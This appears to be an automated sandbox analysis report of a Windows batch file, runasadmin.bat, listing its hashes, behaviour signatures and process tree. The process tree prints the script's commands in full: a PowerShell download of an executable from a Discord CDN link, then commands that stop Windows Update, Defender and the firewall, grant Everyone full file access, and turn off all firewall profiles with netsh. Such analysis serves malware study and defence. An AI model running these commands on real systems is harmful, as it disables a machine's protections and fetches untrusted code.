Analysis
-
max time kernel
35s -
max time network
19s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
22-05-2024 18:04
Static task
static1
General
-
Target
runasadmin.bat
-
Size
1KB
-
MD5
27385fc8820b394db863c320f3bb48f2
-
SHA1
5c231e5d149ff97d8d435ef9442a41a94eecf716
-
SHA256
f7d324eec5fc6cec83bdafd21c65e6909d847c7ea40091b87243bfd5c2c0f549
-
SHA512
66133441896602787b60e604962f181f06171d101765da80813a952636f245ace68d51971709f783749ee4f41ef9860912de82f5d87485c278635f6f82a802c0
Malware Config
Signatures
-
Modifies Windows Firewall 2 TTPs 7 IoCs
Processes:
netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exepid process 1128 netsh.exe 2756 netsh.exe 2592 netsh.exe 2736 netsh.exe 564 netsh.exe 572 netsh.exe 1652 netsh.exe -
Possible privilege escalation attempt 3 IoCs
Processes:
takeown.exeicacls.exeicacls.exepid process 2160 takeown.exe 2752 icacls.exe 2584 icacls.exe -
Modifies file permissions 1 TTPs 3 IoCs
Processes:
takeown.exeicacls.exeicacls.exepid process 2160 takeown.exe 2752 icacls.exe 2584 icacls.exe -
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exepid process 2728 sc.exe 2684 sc.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 1728 timeout.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2300 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2300 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exenet.exenet.exenet.exenet.exedescription pid process target process PID 1760 wrote to memory of 2300 1760 cmd.exe powershell.exe PID 1760 wrote to memory of 2300 1760 cmd.exe powershell.exe PID 1760 wrote to memory of 2300 1760 cmd.exe powershell.exe PID 1760 wrote to memory of 2684 1760 cmd.exe sc.exe PID 1760 wrote to memory of 2684 1760 cmd.exe sc.exe PID 1760 wrote to memory of 2684 1760 cmd.exe sc.exe PID 1760 wrote to memory of 2728 1760 cmd.exe sc.exe PID 1760 wrote to memory of 2728 1760 cmd.exe sc.exe PID 1760 wrote to memory of 2728 1760 cmd.exe sc.exe PID 1760 wrote to memory of 2576 1760 cmd.exe net.exe PID 1760 wrote to memory of 2576 1760 cmd.exe net.exe PID 1760 wrote to memory of 2576 1760 cmd.exe net.exe PID 2576 wrote to memory of 2776 2576 net.exe net1.exe PID 2576 wrote to memory of 2776 2576 net.exe net1.exe PID 2576 wrote to memory of 2776 2576 net.exe net1.exe PID 1760 wrote to memory of 2556 1760 cmd.exe net.exe PID 1760 wrote to memory of 2556 1760 cmd.exe net.exe PID 1760 wrote to memory of 2556 1760 cmd.exe net.exe PID 2556 wrote to memory of 2704 2556 net.exe net1.exe PID 2556 wrote to memory of 2704 2556 net.exe net1.exe PID 2556 wrote to memory of 2704 2556 net.exe net1.exe PID 1760 wrote to memory of 2160 1760 cmd.exe takeown.exe PID 1760 wrote to memory of 2160 1760 cmd.exe takeown.exe PID 1760 wrote to memory of 2160 1760 cmd.exe takeown.exe PID 1760 wrote to memory of 2752 1760 cmd.exe icacls.exe PID 1760 wrote to memory of 2752 1760 cmd.exe icacls.exe PID 1760 wrote to memory of 2752 1760 cmd.exe icacls.exe PID 1760 wrote to memory of 2584 1760 cmd.exe icacls.exe PID 1760 wrote to memory of 2584 1760 cmd.exe icacls.exe PID 1760 wrote to memory of 2584 1760 cmd.exe icacls.exe PID 1760 wrote to memory of 2460 1760 cmd.exe net.exe PID 1760 wrote to memory of 2460 1760 cmd.exe net.exe PID 1760 wrote to memory of 2460 1760 cmd.exe net.exe PID 2460 wrote to memory of 2772 2460 net.exe net1.exe PID 2460 wrote to memory of 2772 2460 net.exe net1.exe PID 2460 wrote to memory of 2772 2460 net.exe net1.exe PID 1760 wrote to memory of 2524 1760 cmd.exe net.exe PID 1760 wrote to memory of 2524 1760 cmd.exe net.exe PID 1760 wrote to memory of 2524 1760 cmd.exe net.exe PID 2524 wrote to memory of 2600 2524 net.exe net1.exe PID 2524 wrote to memory of 2600 2524 net.exe net1.exe PID 2524 wrote to memory of 2600 2524 net.exe net1.exe PID 1760 wrote to memory of 2756 1760 cmd.exe netsh.exe PID 1760 wrote to memory of 2756 1760 cmd.exe netsh.exe PID 1760 wrote to memory of 2756 1760 cmd.exe netsh.exe PID 1760 wrote to memory of 2592 1760 cmd.exe netsh.exe PID 1760 wrote to memory of 2592 1760 cmd.exe netsh.exe PID 1760 wrote to memory of 2592 1760 cmd.exe netsh.exe PID 1760 wrote to memory of 2736 1760 cmd.exe netsh.exe PID 1760 wrote to memory of 2736 1760 cmd.exe netsh.exe PID 1760 wrote to memory of 2736 1760 cmd.exe netsh.exe PID 1760 wrote to memory of 564 1760 cmd.exe netsh.exe PID 1760 wrote to memory of 564 1760 cmd.exe netsh.exe PID 1760 wrote to memory of 564 1760 cmd.exe netsh.exe PID 1760 wrote to memory of 572 1760 cmd.exe netsh.exe PID 1760 wrote to memory of 572 1760 cmd.exe netsh.exe PID 1760 wrote to memory of 572 1760 cmd.exe netsh.exe PID 1760 wrote to memory of 1652 1760 cmd.exe netsh.exe PID 1760 wrote to memory of 1652 1760 cmd.exe netsh.exe PID 1760 wrote to memory of 1652 1760 cmd.exe netsh.exe PID 1760 wrote to memory of 1128 1760 cmd.exe netsh.exe PID 1760 wrote to memory of 1128 1760 cmd.exe netsh.exe PID 1760 wrote to memory of 1128 1760 cmd.exe netsh.exe PID 1760 wrote to memory of 1728 1760 cmd.exe timeout.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\runasadmin.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest https://cdn.discordapp.com/attachments/1239070337228865601/1242889939524259870/shutdown.exe?ex=664f7af5&is=664e2975&hm=8334727a2bec5b610b6e37fcf28e25d2d51052e173836b06f92cce2cff19e593& -OutFile C:\shutdown.exe"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\sc.exesc config "wuauserv" start= disabled2⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc config "TrustedInstaller" start= disabled2⤵
- Launches sc.exe
-
C:\Windows\system32\net.exenet stop wuauserv2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wuauserv3⤵
-
C:\Windows\system32\net.exenet stop TrustedInstaller2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrustedInstaller3⤵
-
C:\Windows\system32\takeown.exetakeown /F C:\X\Y\Z /A /R2⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls C:\X\Y\Z /grant Everyone:F /T2⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls . /grant Everyone:F /T /C /Q2⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\net.exenet stop "Windows Defender Service"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Windows Defender Service"3⤵
-
C:\Windows\system32\net.exenet stop "Windows Firewall"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Windows Firewall"3⤵
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable2⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE2⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off2⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off2⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off2⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off2⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off2⤵
- Modifies Windows Firewall
-
C:\Windows\system32\timeout.exetimeout /t 1 /nobreak2⤵
- Delays execution with timeout.exe
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/2300-4-0x000007FEF561E000-0x000007FEF561F000-memory.dmpFilesize
4KB
-
memory/2300-5-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmpFilesize
9.6MB
-
memory/2300-6-0x000000001B220000-0x000000001B502000-memory.dmpFilesize
2.9MB
-
memory/2300-8-0x0000000001F40000-0x0000000001F48000-memory.dmpFilesize
32KB
-
memory/2300-7-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmpFilesize
9.6MB
-
memory/2300-9-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmpFilesize
9.6MB
-
memory/2300-10-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmpFilesize
9.6MB